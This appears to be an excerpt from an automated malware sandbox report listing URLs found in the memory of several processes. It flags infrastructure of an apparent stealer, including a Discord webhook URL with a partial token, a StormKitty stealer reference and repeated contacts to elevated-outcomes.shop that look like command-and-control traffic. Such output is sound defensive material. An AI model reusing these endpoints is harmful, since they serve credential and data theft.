Source: RegAsm.exe, 0000001E.00000002.2523210582.0000000001A3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsm.exe, 0000001E.00000002.2522471882.00000000019A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabV/e&
Source: curcuma.exe, 00000024.00000003.2420129542.000002428F06A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2402711862.000002428F06A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://e5.i.lencr.org/0A
Source: curcuma.exe, 00000024.00000003.2420129542.000002428F06A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2402711862.000002428F06A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://e5.o.lencr.org0
Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://ipinfo.io/ip
Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: curcuma.exe, 00000024.00000003.2420129542.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msn.com
Source: ADFoyxP.exe, 00000000.00000002.2123799462.0000000000408000.00000002.00000001.01000000.00000003.sdmp, ADFoyxP.exe, 00000000.00000000.1242829595.0000000000408000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: RegAsm.exe, 0000001E.00000002.2523751705.0000000003501000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp, Seat.com, 00000013.00000000.1359198042.0000000000CA5000.00000002.00000001.01000000.00000007.sdmp, TradeHub.com, 0000001B.00000002.1436576293.0000000000435000.00000002.00000001.01000000.00000009.sdmp, TradeHub.com, 0000001D.00000000.1470180369.0000000000435000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://alekberg.net/privacy
Source: curcuma.exe, 00000024.00000003.2295960639.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com%22
Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.js
Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.js5.55
Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.jst
Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.jstt
Source: curcuma.exe, 00000024.00000003.2416786438.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/diagnostic-web-vitals.95b1542329807b1f42ef.js
Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.js
Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.jsepoch
Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.jsnce_epocht
Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.jst
Source: curcuma.exe, 00000024.00000003.2344877173.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.js
Source: curcuma.exe, 00000024.00000003.2344877173.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.js5
Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.jsibox
Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js
Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js.55
Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js5
Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js6:34:43Z
Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.jsjs
Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.jsm
Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.jst
Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/waffle-wc.163df88679884777ae49.js
Source: curcuma.exe, 00000024.00000003.2308688761.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2295206449.000002428F062000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2403525425.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/config/v1/&os=windows&locale=
Source: curcuma.exe, 00000024.00000003.2433987605.000002428EFE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/service/news/feed/pages/weblayout?User=m-3B61B35AD2B06E2C0F4DA6F2D3A26FDA&act
Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/statics/icons/favicon.ico
Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/statics/icons/favicon.icoa
Source: curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.png
Source: curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.pngM
Source: curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.pngu
Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/brand/new-msn-logo-color-black.svg
Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/brand/new-msn-logo-color-black.svgt
Source: curcuma.exe, 00000024.00000003.2404283955.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2419008052.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2401955377.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/FeedSettings.svg
Source: curcuma.exe, 00000024.00000003.2419008052.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2401955377.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/FeedSettings.svg=APP_ANON&source=marke
Source: curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://azureedge.net
Source: curcuma.exe, 00000024.00000003.2401155848.000002428F06A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://browser.events.data.msn.
Source: curcuma.exe, 00000024.00000003.2404283955.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2418196116.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-strea
                  Source: curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                  Source: curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusinessu
                  Source: curcuma.exe, 00000024.00000003.2404159872.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/c.gif?rnd=1741365293756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&t
                  Source: curcuma.exe, 00000024.00000003.2308688761.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308515239.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2295206449.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.dns.nextdns.io
                  Source: curcuma.exe, 00000024.00000003.2308515239.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.googleusercontent.com/crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5
                  Source: curcuma.exe, 00000024.00000003.2357444651.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2419889648.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308688761.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2402464885.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report
                  Source: curcuma.exe, 00000024.00000002.2521090954.000002428F011000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: curcuma.exe, 00000024.00000003.2357444651.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnt
                  Source: curcuma.exe, 00000024.00000003.2419889648.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308688761.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2402464885.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/reportcat=msn
                  Source: curcuma.exe, 00000024.00000003.2357444651.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/reportt
                  Source: curcuma.exe, 00000024.00000003.2344877173.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
                  Source: curcuma.exe, 00000024.00000003.2383601149.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacy
                  Source: curcuma.exe, 00000024.00000003.2383601149.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacyquery
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/Char
                  Source: curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
                  Source: curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
                  Source: curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.cox.net/dns-query
                  Source: curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.familyshield.opendns.com/dns-query
                  Source: curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset1/asset
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/assetch
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/assetexternal%26uc
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/assett
                  Source: curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                  Source: curcuma.exe, 00000024.00000003.2386235587.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/assetetas
                  Source: curcuma.exe, 00000024.00000003.2416786438.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/assett
                  Source: curcuma.exe, 00000024.00000003.2416786438.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/assett0
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                  Source: curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/assetet
                  Source: curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/assetng
                  Source: curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                  Source: curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset/ass
                  Source: curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/assetShor
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/assetn
                  Source: curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/assetss
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                  Source: curcuma.exe, 00000024.00000003.2075282516.000002428D619000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2517104645.000002428D619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/
                  Source: curcuma.exe, 00000024.00000002.2517104645.000002428D619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/&
                  Source: curcuma.exe, 00000024.00000002.2520369587.000002428EFB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3Mw
                  Source: curcuma.exe, 00000024.00000002.2520369587.000002428EFB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3Mw)
                  Source: curcuma.exe, 00000024.00000002.2517104645.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2075282516.000002428D5A8000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2049515469.000002428D5A8000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2100818963.000002428D5A8000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2466209800.000002428D5D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV88cN
                  Source: curcuma.exe, 00000024.00000003.2466209800.000002428D619000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2100818963.000002428D619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/rueT
                  Source: curcuma.exe, 00000024.00000002.2517104645.000002428D619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/v
                  Source: curcuma.exe, 00000024.00000003.2100818963.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2517104645.000002428D5D5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2466209800.000002428D5D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop:443
                  Source: curcuma.exe, 00000024.00000003.2050015519.000002428D5C8000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2075282516.000002428D5A8000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2517104645.000002428D587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop:443/NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV
                  Source: curcuma.exe, 00000024.00000003.2295960639.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ent-api.msn.com/%22
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11MSkH.img
